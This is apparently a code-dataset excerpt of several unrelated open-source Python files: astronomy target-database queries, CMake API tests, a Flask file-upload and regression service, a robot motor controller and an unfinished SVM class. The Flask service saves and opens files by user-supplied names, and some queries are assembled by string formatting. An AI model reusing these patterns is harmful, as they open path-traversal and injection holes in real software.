targets\".format(nt=nt), flush=True)\n tmp_targets = None\n if(nt > 0):\n tmp_targets = np.zeros(nt, dtype=target_dtype)\n\n ts = (targetdb.Target.select(targetdb.Target.ra,\n targetdb.Target.dec,\n targetdb.Target.pmra,\n targetdb.Target.pmdec,\n targetdb.Target.epoch,\n targetdb.Target.parallax,\n targetdb.Target.pk.alias('target_pk'),\n targetdb.Target.catalogid,\n targetdb.CartonToTarget.pk.alias('carton_to_target_pk'),\n targetdb.CartonToTarget.priority,\n targetdb.CartonToTarget.value,\n targetdb.CartonToTarget.lambda_eff,\n targetdb.CartonToTarget.delta_ra,\n targetdb.CartonToTarget.delta_dec,\n targetdb.CartonToTarget.can_offset,\n targetdb.Magnitude.g,\n targetdb.Magnitude.r,\n targetdb.Magnitude.i,\n targetdb.Magnitude.bp,\n targetdb.Magnitude.gaia_g,\n targetdb.Magnitude.rp,\n targetdb.Magnitude.h,\n targetdb.Magnitude.z,\n targetdb.Magnitude.j,\n targetdb.Magnitude.k,\n targetdb.Carton.carton,\n targetdb.Carton.pk.alias('carton_pk'),\n targetdb.Carton.program,\n targetdb.Mapper.label.alias('mapper'),\n targetdb.Category.label.alias('category'),\n targetdb.Cadence.label_root.alias('cadence'),\n targetdb.Instrument.label.alias('fiberType'),\n catalogdb.Version.plan.alias('catalogdb_plan'),\n targetdb.Version.plan,\n targetdb.Version.tag)\n .join(targetdb.CartonToTarget)\n .join(targetdb.Instrument, peewee.JOIN.LEFT_OUTER).switch(targetdb.CartonToTarget)\n .join(targetdb.Cadence, peewee.JOIN.LEFT_OUTER).switch(targetdb.CartonToTarget)\n .join(targetdb.Magnitude, peewee.JOIN.LEFT_OUTER).switch(targetdb.CartonToTarget)\n .join(targetdb.Carton)\n .join(targetdb.Mapper, peewee.JOIN.LEFT_OUTER).switch(targetdb.Carton)\n .join(targetdb.Version).switch(targetdb.Carton)\n .join(targetdb.Category).switch(targetdb.Target)\n .join(catalogdb.Catalog, on=(catalogdb.Catalog.catalogid == targetdb.Target.catalogid))\n .join(catalogdb.Version)\n .where((targetdb.Carton.carton == carton) &\n (targetdb.Version.plan == version))).dicts()\n\n castn = dict()\n for n in tmp_targets.dtype.names:\n castn[n] = np.cast[type(tmp_targets[n][0])]\n \n problems = []\n for indx, t in enumerate(ts):\n for n in tmp_targets.dtype.names:\n if((n != 'rsid') & (n != 'stage') & (n != 'magnitude')):\n if(t[n] is not None):\n tmp_targets[n][indx] = castn[n](t[n])\n else:\n if(n not in problems):\n print(\"problem with {n}\".format(n=n))\n problems.append(n)\n elif(n == 'magnitude'):\n tmp_targets['magnitude'][indx, 0] = np.float32(t['g'])\n tmp_targets['magnitude'][indx, 1] = np.float32(t['r'])\n tmp_targets['magnitude'][indx, 2] = np.float32(t['i'])\n tmp_targets['magnitude'][indx, 3] = np.float32(t['z'])\n tmp_targets['magnitude'][indx, 4] = np.float32(t['bp'])\n tmp_targets['magnitude'][indx, 5] = np.float32(t['gaia_g'])\n tmp_targets['magnitude'][indx, 6] = np.float32(t['rp'])\n tmp_targets['magnitude'][indx, 7] = np.float32(t['j'])\n tmp_targets['magnitude'][indx, 8] = np.float32(t['h'])\n tmp_targets['magnitude'][indx, 9] = np.float32(t['k'])\n\n tmp_targets['rsid'] = tmp_targets['carton_to_target_pk']\n\n if(c2c is not None):\n inofibertype = np.where(tmp_targets['fiberType'] == '')[0]\n if(len(inofibertype) > 0):\n msg = \"WARNING: {n} targets in {c} with no fiberType\".format(n=len(inofibertype), c=carton)\n if(carton in c2c['CartonToFiberType']):\n fiberType = c2c.get('CartonToFiberType', carton)\n print(\"{msg}, SETTING TO {fiberType}\".format(msg=msg, fiberType=fiberType))\n tmp_targets['fiberType'][inofibertype] = fiberType\n else:\n print(\"{msg}, NOT FIXING\".format(msg=msg))\n\n inocadence = np.where(tmp_targets['cadence'] == '')[0]\n if(len(inocadence) > 0):\n msg = \"WARNING: {n} targets in {c} with no cadence\".format(n=len(inocadence), c=carton)\n if(carton in c2c['CartonToCadence']):\n cadence = c2c.get('CartonToCadence', carton)\n print(\"{msg}, SETTING TO {cadence}\".format(msg=msg, cadence=cadence))\n tmp_targets['cadence'][inocadence] = cadence\n if(cadence == 'dark_174x8'):\n ii = np.where((np.abs(tmp_targets['ra'][inocadence] - 90.) < 6.) &\n (np.abs(tmp_targets['dec'][inocadence] + 66.56) < 2.))[0]\n if(len(ii) > 0):\n tmp_targets['cadence'][inocadence[ii]] = 'dark_100x8'\n else:\n print(\"{msg}, NOT FIXING\".format(msg=msg))\n\n return(tmp_targets)\n\n\ndef match_v1_to_v0p5(catalogids_v1=None, all=False):\n \"\"\"Find catalogids in v0.5 corresponding to v1\n \n Parameters\n ----------\n\n catalogids_v1 : ndarray of np.int64\n input catalogids in v1\n\n all : bool\n if set True, return all v0.5 catalogids (not just one)\n\n Returns\n -------\n\n catalogids_v1 : ndarray of np.int64\n catalogids in v1\n\n catalogids_v0p5 : ndarray of np.int64\n catalogids in v0.5 (-1 if not found)\n\n Notes\n -----\n\n If all is False, then the two arrays are in the same\n order as the input list, and have the same length.\n\n If all is True, then only matches are included in the \n output lists, and repeats are included\n\n Hard-coded between these two versions because the db\n has the version names hard-coded into tables\n\"\"\"\n if(len(catalogids_v1) == 0):\n return(np.zeros(0, dtype=np.int64),\n np.zeros(0, dtype=np.int64))\n \n # Construct query\n sql_template = \"\"\"SELECT catalogid1, catalogid2 FROM catalogdb.catalog_ver25_to_ver31_full_unique JOIN (VALUES {v}) AS ver31(catalogid) ON catalogdb.catalog_ver25_to_ver31_full_unique.catalogid2 = ver31.catalogid;\n\"\"\"\n values = \"\"\n ucatalogids_v1 = np.unique(catalogids_v1)\n for value in ucatalogids_v1:\n values = values + \"({v}),\".format(v=value)\n values = values[0:-1]\n sql_command = sql_template.format(v=values)\n\n if(all is False):\n # Set up output\n out_catalogids_v1 = catalogids_v1\n out_catalogids_v0p5 = np.zeros(len(catalogids_v1), dtype=np.int64) - 1\n indxs = dict()\n for cid_v1 in ucatalogids_v1:\n indxs[cid_v1] = np.where(catalogids_v1 == cid_v1)[0]\n\n # Run query\n cursor = database.execute_sql(sql_command)\n for row in cursor.fetchall():\n catalogid_v1 = row[1]\n catalogid_v0p5 = row[0]\n out_catalogids_v0p5[indxs[catalogid_v1]] = catalogid_v0p5\n else:\n cursor = database.execute_sql(sql_command)\n out_catalogids_v1 = np.zeros(len(catalogids_v1), dtype=np.int64)\n out_catalogids_v0p5 = np.zeros(len(catalogids_v1), dtype=np.int64)\n i = 0\n for row in cursor.fetchall():\n out_catalogids_v1[i] = row[1]\n out_catalogids_v0p5[i] = row[0]\n i = i + 1\n if(i >= len(out_catalogids_v1)):\n out_catalogids_v1 = np.append(out_catalogids_v1,\n np.zeros(len(out_catalogids_v1),\n dtype=np.int64) - 1)\n out_catalogids_v0p5 = np.append(out_catalogids_v0p5,\n np.zeros(len(out_catalogids_v0p5),\n dtype=np.int64) - 1)\n out_catalogids_v1 = out_catalogids_v1[0:i]\n out_catalogids_v0p5 = out_catalogids_v0p5[0:i]\n \n return(out_catalogids_v1, out_catalogids_v0p5)\n\n\ndef catalogids_are_targets(catalogids=None):\n \"\"\"Check if catalogids are in target table\n\n Parameters\n ----------\n\n catalogids : ndarray of np.int64\n catalogids \n\n Returns\n -------\n\n istarget : ndarray of bool\n whether present\n\"\"\"\n # Construct query\n sql_template = \"\"\"SELECT targetdb.target.catalogid FROM targetdb.target\nJOIN (VALUES {v}) AS input(catalogid) ON targetdb.target.catalogid = input.catalogid;\n\"\"\"\n\n values = \"\"\n ucatalogids = np.unique(catalogids)\n for value in ucatalogids:\n values = values + \"({v}),\".format(v=value)\n values = values[0:-1]\n sql_command = sql_template.format(v=values)\n\n # Set up output\n istarget = np.zeros(len(catalogids), dtype=bool)\n indxs = dict()\n for cid in ucatalogids:\n indxs[cid] = np.where(catalogids == cid)[0]\n \n # Run query\n cursor = database.execute_sql(sql_command)\n for row in cursor.fetchall():\n catalogid = row[0]\n istarget[indxs[catalogid]] = True\n\n return(istarget)\n\n\ndef catalogids_to_target_ids(catalogids=None, input_catalog=None):\n \"\"\"Return target_ids for input catalog for catalogid\n\n Parameters\n ----------\n\n catalogids : ndarray of np.int64\n catalogids \n\n input_catalog : str\n name of input catalog (like 'tic_v8')\n\n Returns\n -------\n\n target_ids : ndarray of np.int64\n input catalog IDs\n\"\"\"\n # Construct query\n sql_template = \"\"\"SELECT catalogdb.catalog.catalogid, catalogdb.catalog_to_{s}.target_id FROM catalogdb.catalog\nJOIN catalogdb.catalog_to_{s} ON catalogdb.catalog.catalogid = catalogdb.catalog_to_{s}.catalogid\nJOIN (VALUES {v}) AS desired(catalogid) ON catalogdb.catalog.catalogid = desired.catalogid;\n\"\"\"\n\n values = \"\"\n ucatalogids = np.unique(catalogids)\n for value in ucatalogids:\n values = values + \"({v}),\".format(v=value)\n values = values[0:-1]\n sql_command = sql_template.format(v=values, s=input_catalog)\n\n # Set up output\n target_ids = np.zeros(len(catalogids), dtype=np.int64) - 1\n indxs = dict()\n for cid in ucatalogids:\n indxs[cid] = np.where(catalogids == cid)[0]\n \n # Run query\n cursor = database.execute_sql(sql_command)\n for row in cursor.fetchall():\n catalogid = row[0]\n target_id = row[1]\n target_ids[indxs[catalogid]] = target_id\n\n return(target_ids)\n\n\ndef target_ids_to_catalogids(target_ids=None, input_catalog=None,\n crossmatch=None):\n \"\"\"Map target_id to a catalogids from a particular version\n\n Parameters\n ----------\n\n target_ids : ndarray of np.int64\n IDs from input catalog\n\n crossmatch : str\n cross match version\n\n input_catalog : str\n name of input catalog (like 'tic_v8')\n\n Returns\n -------\n\n catalogids : ndarray of np.int64\n catalogids \n\"\"\"\n # Construct query\n sql_template = \"\"\"SELECT catalogdb.catalog_to_{s}.target_id, catalogdb.catalog.catalogid FROM catalogdb.catalog_to_{s}\nJOIN (VALUES {v}) AS desired(target_id) ON catalogdb.catalog_to_{s}.target_id = desired.target_id\nJOIN catalogdb.catalog ON catalogdb.catalog.catalogid = catalogdb.catalog_to_{s}.catalogid\nJOIN catalogdb.version ON catalogdb.version.id = catalogdb.catalog.version_id\nWHERE catalogdb.version.plan = '{c}';\n\"\"\"\n\n values = \"\"\n utarget_ids = np.unique(target_ids)\n for value in utarget_ids:\n values = values + \"({v}),\".format(v=value)\n values = values[0:-1]\n sql_command = sql_template.format(v=values, c=crossmatch, s=input_catalog)\n\n # Set up output\n catalogids = np.zeros(len(target_ids), dtype=np.int64) - 1\n indxs = dict()\n for tid in utarget_ids:\n indxs[tid] = np.where(target_ids == tid)[0]\n \n # Run query\n cursor = database.execute_sql(sql_command)\n for row in cursor.fetchall():\n target_id = row[0]\n catalogid = row[1]\n catalogids[indxs[target_id]] = catalogid\n\n return(catalogids)\n","repo_name":"sdss/robostrategy","sub_path":"python/robostrategy/targets.py","file_name":"targets.py","file_ext":"py","file_size_in_byte":17970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26898656592","text":"import subprocess\nfrom pathlib import Path\n\nfrom cmake_language_server.api import API\n\n\ndef test_query_with_cache(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n assert api.query()\n\n query = cmake_build / \".cmake\" / \"api\" / \"v1\" / \"query\"\n assert query.exists()\n\n reply = cmake_build / \".cmake\" / \"api\" / \"v1\" / \"reply\"\n assert reply.exists()\n\n\ndef test_query_without_cache(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n (cmake_build / \"CMakeCache.txt\").unlink()\n\n assert not api.query()\n\n\ndef test_read_variable(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n assert api.query()\n assert api.read_reply()\n\n assert api.get_variable_doc(\"testproject_BINARY_DIR\")\n\n\ndef test_read_cmake_files(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n api.parse_doc()\n assert api.query()\n api.read_reply()\n\n import platform\n\n system = platform.system()\n cxx = api.get_variable_doc(\"CMAKE_CXX_COMPILER_ID\")\n assert cxx is not None\n if system == \"Linux\":\n assert \"GNU\" in cxx\n elif system == \"Windows\":\n assert \"MSVC\" in cxx\n elif system == \"Darwin\":\n assert \"Clang\" in cxx\n else:\n raise RuntimeError(\"Unexpected system\")\n\n\ndef test_parse_commands(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n api.parse_doc()\n\n p = subprocess.run(\n [\"cmake\", \"--help-command-list\"],\n universal_newlines=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n commands = p.stdout.strip().split(\"\\n\")\n\n for command in commands:\n assert api.get_command_doc(command) is not None, f\"{command} not found\"\n\n break_doc = api.get_command_doc(\"break\")\n assert break_doc is not None and \"break()\" in break_doc\n assert api.get_command_doc(\"not_existing_command\") is None\n\n\ndef test_parse_variables(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n api.parse_doc()\n\n p = subprocess.run(\n [\"cmake\", \"--help-variable-list\"],\n universal_newlines=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n variables = p.stdout.strip().split(\"\\n\")\n\n for variable in variables:\n if \"<\" in variable:\n continue\n assert api.get_variable_doc(variable) is not None, f\"{variable} not found\"\n\n assert api.get_variable_doc(\"BUILD_SHARED_LIBS\") is not None\n assert api.get_variable_doc(\"not_existing_variable\") is None\n\n\ndef test_parse_modules(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n api.parse_doc()\n\n p = subprocess.run(\n [\"cmake\", \"--help-module-list\"],\n universal_newlines=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n modules = p.stdout.strip().split(\"\\n\")\n\n for module in modules:\n if module.startswith(\"Find\"):\n assert (\n api.get_module_doc(module[4:], True) is not None\n ), f\"{module} not found\"\n else:\n assert api.get_module_doc(module, False) is not None, f\"{module} not found\"\n\n assert api.get_module_doc(\"GoogleTest\", False) is not None\n assert api.get_module_doc(\"GoogleTest\", True) is None\n assert api.search_module(\"GoogleTest\", False) == [\"GoogleTest\"]\n assert api.search_module(\"GoogleTest\", True) == []\n assert api.get_module_doc(\"Boost\", False) is None\n assert api.get_module_doc(\"Boost\", True) is not None\n assert api.search_module(\"Boost\", False) == []\n assert api.search_module(\"Boost\", True) == [\"Boost\"]\n","repo_name":"regen100/cmake-language-server","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","stars":274,"dataset":"github-code","pt":"61"} +{"seq_id":"13409210430","text":"import ctypes\nimport ctypes.wintypes\n\n# Define necessary Windows API functions and types\nuser32 = ctypes.windll.user32\n\n# FindWindowA function\nFindWindowA = user32.FindWindowA\nFindWindowA.argtypes = [ctypes.c_char_p, ctypes.c_char_p]\nFindWindowA.restype = ctypes.wintypes.HWND\n\n# SetWindowTextW function\nSetWindowTextW = user32.SetWindowTextW\nSetWindowTextW.argtypes = [ctypes.wintypes.HWND, ctypes.c_wchar_p]\nSetWindowTextW.restype = ctypes.c_bool\n\ndef change_paint_title(new_title):\n # Find the Paint window by its class name (\"Paint\")\n paint_window = FindWindowA(b\"MSPaintApp\", None)\n\n if paint_window:\n # Change the title of the Paint window\n success = SetWindowTextW(paint_window, new_title)\n\n if success:\n print(f\"Title of Paint window changed to: {new_title}\")\n else:\n print(\"Failed to change the title of the Paint window.\")\n else:\n print(\"Paint window not found.\")\n\nif __name__ == \"__main__\":\n new_title = \"Hello from Python!\"\n change_paint_title(new_title)\n","repo_name":"mhmd-azeez/c-ffi","sub_path":"hwnd/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"12389218988","text":"from itertools import permutations\n\ndef list_to_int(arr):\n string = \"\"\n for l in arr:\n string += l\n return int(string)\n\ndef calc(num1, num2, sign):\n if sign == \"+\":\n return num1+num2\n if sign == \"-\":\n return num1-num2\n if sign == \"*\":\n return num1*num2\n \ndef calc_with_operator(operands, operators, prior_opr):\n operators.reverse()\n operators.append(\"\")\n operators.reverse()\n\n stack = []\n num_stack = []\n opr_stack = []\n \n for operand, operator in zip(operands, operators):\n if not num_stack:\n num_stack.append(operand)\n continue\n \n if operator == prior_opr:\n num_stack.append(calc(num_stack.pop(), operand, operator))\n continue\n else:\n num_stack.append(operand)\n opr_stack.append(operator)\n \n return num_stack, opr_stack\n \ndef seperator(expression):\n signs = [\"+\", \"-\", \"*\"]\n \n number = []\n num_stack = []\n opr_stack = []\n for e in expression:\n if e in signs:\n num_stack.append(list_to_int(number))\n opr_stack.append(e)\n number = []\n else:\n number.append(e)\n num_stack.append(list_to_int(number))\n \n return num_stack, opr_stack\n\ndef calc_with_priority(operands, operators, priority):\n tmp_operands = [operand for operand in operands]\n tmp_operators = [operator for operator in operators]\n\n for p in priority:\n tmp_operands, tmp_operators = calc_with_operator(tmp_operands, tmp_operators, p)\n \n return int(tmp_operands[0])\n \n \n\ndef solution(expression):\n operands, operators = seperator(expression)\n \n priorities = list(permutations(list(set(operators))))\n print(priorities)\n \n max_val = 0\n for priority in priorities:\n max_val = max(max_val, abs(calc_with_priority(operands, operators, priority)))\n \n return max_val","repo_name":"hana-algorithm-study/coding-test","sub_path":"상준/프로그래머스/lv2/67257. [카카오 인턴] 수식 최대화/[카카오 인턴] 수식 최대화.py","file_name":"[카카오 인턴] 수식 최대화.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14123884186","text":"from flask import *\r\nimport pandas as pd\r\nimport os\r\nfrom flask_cors import CORS\r\nfrom flask_jsonpify import jsonpify\r\nimport matplotlib.pyplot as plt\r\n\r\napp=Flask(\"__name__\")\r\nCORS(app)\r\n\r\n@app.route('/upload', methods = ['POST']) \r\ndef upload(): \r\n if request.method == 'POST': \r\n f = request.files['file'] \r\n f.save(f.filename) \r\n # print(request.get_data())\r\n\r\n # print(\"fine\")\r\n try:\r\n df=pd.read_csv(f.filename)\r\n except:\r\n try:\r\n df=pd.read_excel(f.filename)\r\n except:\r\n return jsonify(\"Please upload a valid file. i.e the file should be CSV or Xlsx\")\r\n print(df)\r\n return jsonify(\"File uploaded sucessfully\")\r\n\r\n\r\n@app.route('//head')\r\ndef head(filename):\r\n try:\r\n df=pd.read_csv(filename, header=None)\r\n except:\r\n df=pd.read_excel(filename, header=None)\r\n\r\n print(\"---------------------------------\")\r\n \r\n head = df.head().values.tolist()\r\n print(head)\r\n JSONP_data = jsonpify(head)\r\n return JSONP_data\r\n\r\n@app.route('//describe')\r\ndef desc(filename):\r\n try:\r\n df=pd.read_csv(filename, header=None)\r\n except:\r\n df=pd.read_excel(filename, header=None)\r\n print(\"---------------------------------\")\r\n desc = df.describe().values.tolist()\r\n print(desc)\r\n JSONP_data = jsonpify(desc)\r\n return JSONP_data\r\n\r\n@app.route('//plot//')\r\ndef plotgraph (filename,x,y):\r\n try:\r\n df=pd.read_csv(filename, header=None)\r\n except:\r\n df=pd.read_excel(filename, header=None)\r\n \r\n X= df[int(x)].values.tolist() \r\n Y= df[int(y)].values.tolist() \r\n plt.scatter(X,Y)\r\n plt.title(\"distribution\")\r\n plt.xlabel(x)\r\n plt.ylabel(y)\r\n print(\"---------------------------------\")\r\n # print(type(image))\r\n # return render_template('untitled1.html', name = plt.show())\r\n plt.savefig(\"plotimage.png\")\r\n return jsonify(\"okay\")\r\n\r\n@app.route('//shape')\r\ndef shape(filename):\r\n try:\r\n df=pd.read_csv(filename, header=None)\r\n except:\r\n df=pd.read_excel(filename, header=None)\r\n\r\n print(\"---------------------------------\")\r\n\r\n x,y= df.shape\r\n print(x,y)\r\n dictin={\"rows\":x,\"columns\":y}\r\n return jsonify(dictin)\r\n\r\n\r\n@app.route('///linearregnovice')\r\ndef linearregnovice(filename,predfile):\r\n try:\r\n data=pd.read_csv(filename, header=None)\r\n except:\r\n data=pd.read_excel(filename, header=None)\r\n \r\n print(\"---------------------------------\")\r\n\r\n try:\r\n pred=pd.read_csv(predfile, header=None)\r\n except:\r\n pred=pd.read_excel(predfile, header=None)\r\n \r\n \r\n from sklearn.model_selection import train_test_split\r\n from sklearn.linear_model import LinearRegression\r\n import numpy as np\r\n\r\n X = np.array(data.iloc[:,:-1].values) \r\n y = np.array(data.iloc[:,-1].values)\r\n # X=data.iloc[:,:-1].values # print(len(X)) y=df.iloc[:,-1].values\r\n \r\n \r\n dictin={}\r\n # Splitting the data into training and testing data\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25) \r\n print(\"*************************\")\r\n\r\n regr = LinearRegression()\r\n\r\n regr.fit(X_train, y_train)\r\n \r\n # X_pred=np.array([[8],[6],[5]])\r\n X_pred = np.array(pred.iloc[:,:].values) \r\n # X_pred=np.array([[8,2],[6,5],[5,6]])\r\n\r\n y_pred = regr.predict(X_pred)\r\n # print(X_test,y_pred)\r\n print()\r\n print(regr.score(X_test, y_test))\r\n dictin[\"r2_value\"]=regr.score(X_test, y_test)\r\n dictin[\"X_pred\"]=X_pred.tolist()\r\n dictin[\"y_pred\"]=y_pred.tolist()\r\n\r\n return jsonify(dictin)\r\n\r\n\r\nif __name__==\"__main__\":\r\n port=int(os.environ.get(\"PORT\",5000))\r\n app.run(host= \"0.0.0.0\", port=port)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"HarideepSriperumbooduru/MLToolBox","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23760774213","text":"#!/usr/bin/env python\nfrom __future__ import with_statement\nimport os\nfrom setuptools import setup\n\nreadme = 'README.md'\nif os.path.exists('README.rst'):\n readme = 'README.rst'\nwith open(readme) as f:\n long_description = f.read()\n\nsetup(\n name='stacktracer',\n version='0.1.2',\n author='messense',\n author_email='messense@icloud.com',\n url='https://github.com/messense/stacktracer',\n keywords='stack, tracer, multi-threaded, threading',\n description='Stack tracer for multi-threaded applications',\n long_description=long_description,\n py_modules=['stacktracer'],\n install_requires=[\n 'pygments',\n ],\n include_package_data=True,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: MacOS',\n 'Operating System :: POSIX',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Utilities',\n ],\n)\n","repo_name":"messense/stacktracer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26031325335","text":"import streamlit as st\nimport pandas as pd\n\n# credentials\npage_title = \"CricStars - Dashboard\"\n\n# streamlit\nst.set_page_config(\n '{}'.format(page_title),\n '🏏',\n layout='wide',\n initial_sidebar_state='collapsed',\n menu_items={\n \"Get Help\": \"https://cricstars.streamlit.app\",\n \"About\": \"CrickStars App\",\n },\n)\n\nplayers_list_upload = st.sidebar.file_uploader(\"Upload Players List\", type=[\"csv\"])\nif players_list_upload is not None:\n players_list = pd.read_csv(players_list_upload)\n st.dataframe(players_list)\nelse:\n st.info(\"Upload players list to continue\")\n\n","repo_name":"hirawatt/cricstars","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34094038060","text":"from machine import PWM, Pin, I2C, ADC\nfrom utime import sleep_ms\nfrom ssd1306 import SSD1306_I2C\nimport framebuf\nfrom ultrasonics import *\n\nPROPORCION=0.8\nVELOCITY_R=int((0.805)*65536)\nVELOCITY_L=int((0.75)*65536)\nfrequency=(10000)\nWIDTH = 128\nHEIGHT = 64\n\n\nclass Bot:\n def __init__(self, Ultra):\n self.l1 = PWM(Pin(18))\n self.l1.freq(frequency)\n self.l2 = PWM(Pin(19))\n self.l2.freq(frequency)\n self.step1=0\n self.step2=0\n \n self.Ultra=Ultra\n \n \n self.r1 = PWM(Pin(20))\n self.r1.freq(frequency)\n self.r2 = PWM(Pin(21))\n self.r2.freq(frequency)\n self.stop()\n \n #self.i2c= I2C(1, scl = Pin(15), sda= Pin(14), freq = 200000) \n #self.oled = SSD1306_I2C(WIDTH, HEIGHT, self.i2c)\n #self.erase_oled()\n \n self.encoder2 = Pin(0, Pin.IN)\n self.encoder2.irq(trigger=Pin.IRQ_RISING, handler=self.en2_handler)\n \n self.encoder1 = Pin(2, Pin.IN)\n self.encoder1.irq(trigger=Pin.IRQ_RISING, handler=self.en1_handler)\n \n def en2_handler(self,Pin):\n self.det1=True\n self.step1 += 1\n print(self.step1)\n \n def en1_handler(self,Pin):\n self.det2=True\n self.step2 += 1\n print(self.step2)\n \n \n def left_direction(self):\n self.l1.duty_u16(0)\n self.l2.duty_u16(VELOCITY_L)\n self.r1.duty_u16(VELOCITY_R)\n self.r2.duty_u16(0)\n #sleep_ms(410)\n self.det2=False\n self.step2=0\n while self.step2 < 55:\n if self.det2:\n self.det2=False\n\n def right_direction(self):\n self.l1.duty_u16(VELOCITY_L)\n self.l2.duty_u16(0)\n self.r1.duty_u16(0)\n self.r2.duty_u16(VELOCITY_R)\n #sleep_ms(410)\n self.det1=False\n self.step1=0\n while self.step1 < 58:\n if self.det1:\n self.det1=False\n\n def front_direction(self):\n self.l1.duty_u16(VELOCITY_L)\n self.l2.duty_u16(0)\n self.r1.duty_u16(VELOCITY_R)\n self.r2.duty_u16(0)\n self.det1=False\n self.step1=0\n while self.step1 < 20:\n front=self.Ultra.measure_front()\n if front< 5:\n print(front)\n self.stop()\n break\n if self.det1:\n self.det1=False\n \n def stop(self):\n self.l1.duty_u16(0)\n self.l2.duty_u16(0)\n self.r1.duty_u16(0)\n self.r2.duty_u16(0)\n sleep_ms(500)\n \n def run(self):\n self.front_direction()\n self.left_direction()\n self.right_direction()\n self.stop()\n \n def listener(self, turns):\n negative = True if turns < 0 else False\n while turns != 0:\n turns = turns - 1 if turns > 0 else turns + 1\n if negative:\n #self.print_oled(\"DERECHA\")\n self.right_direction()\n self.stop()\n #self.erase_oled()\n self.stop()\n sleep_ms(500) \n \n else:\n #self.print_oled(\"IZQUIERDA\")\n self.left_direction()\n self.stop()\n #self.erase_oled()\n sleep_ms(500) \n #self.print_oled(\"AVANZA\")\n #self.front_direction()\n #self.stop()\n #self.erase_oled()\n sleep_ms(500)\n \n #def print_oled(self, text):\n # self.oled.text(str(text), 0, 0) \n # self.oled.show()\n\n \n #def erase_oled(self):\n # self.oled.fill(0)\n \n\ndef main():\n bot=Bot(Ultrasonics())\n bot.front_direction()\n bot.stop()\n \nif __name__ == '__main__':\n main()","repo_name":"Valent-in-GIT/Computer-Vision-Personal","sub_path":"Mazebot/Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14355961308","text":"# -*- coding: utf-8 -*-\n# web2py/applications//controllers\nfrom cart import Cart\nfrom cart import OrderError\n\n\n\ndef add():\n product = db(db.product.id == request.args(0)).select().first()\n cart = Cart()\n if product.id in cart:\n try:\n # product.qty should be an int that represents\n # the amount avaiable of the product.\n # If amount of the order > amount_avaiable, an exception\n # will be raised.\n # If amount_avaiable is not set, the module won't check\n # the avaiable.\n cart.AddAmount(product.id, amount_avaiable=product.qty)\n except OrderError as e:\n return e\n else:\n carrinho.NewOrder(produto.id)\n return locals()\n\n\ndef remove():\n product = db(db.product.id == request.args(0)).select().first()\n cart = Cart()\n try:\n # If the order is not found, an exception will be raised.\n cart.DecreaseAmount(product.id)\n except OrderError as e:\n return e\n return locals()\n\n\ndef show():\n cart = Cart()\n cart_dict = cart.ShowCart() # A dict with all orders.\n for id, amount in cart:\n # Do something or\n pass\n return locals()\n\n\n","repo_name":"Marcelo-Theodoro/web2py_cart","sub_path":"example_controller.py","file_name":"example_controller.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30156496699","text":"import numpy as np\nfrom scipy.optimize import minimize\nfrom pandas.core.frame import DataFrame\nfrom pandas.core.series import Series\nfrom scipy.optimize import OptimizeResult\n\nclass DualSVM():\n def gaussKernel(self, xi: np.ndarray):\n xi = np.asmatrix(xi)\n return np.exp(-((np.sum(np.multiply(xi, xi), axis = 1) + np.sum(np.multiply(xi.T, xi.T) , axis = 0) - 2 * xi.T * xi) / self.gamma))\n #return np.exp(-((np.sum(xi.T.dot(xi), axis = 1) + np.sum(np.multiply(xi.T, xi.T) , axis = 0) + 2 * xi.T @ xi) / self.gamma))\n\n def gaussKernelDual(self, xi: np.ndarray, xj: np.ndarray):\n return np.exp(- (((xi-xj)**2).sum())/self.gamma)\n\n def gaussObjective(self, alphas: np.ndarray):\n #return 0.5 * (self.gaussKernel(self.x) * np.dot( (alphas * self.y).T, (alphas*self.y) ) ).sum() - alphas.sum()\n return 0.5 * (self.xg * np.dot((alphas * self.y).T, (alphas*self.y)) ).sum() - alphas.sum()\n\n def constraints(self, alphas: np.ndarray):\n return (alphas * self.yarr).sum()\n\n def objective(self,alphas: np.ndarray):\n return 0.5 * (np.dot(self.x, self.x.T) * np.dot((alphas * self.y).T, (alphas*self.y)) ).sum() - alphas.sum()\n\n def __init__(self, training_data: DataFrame, output_column: str, C = 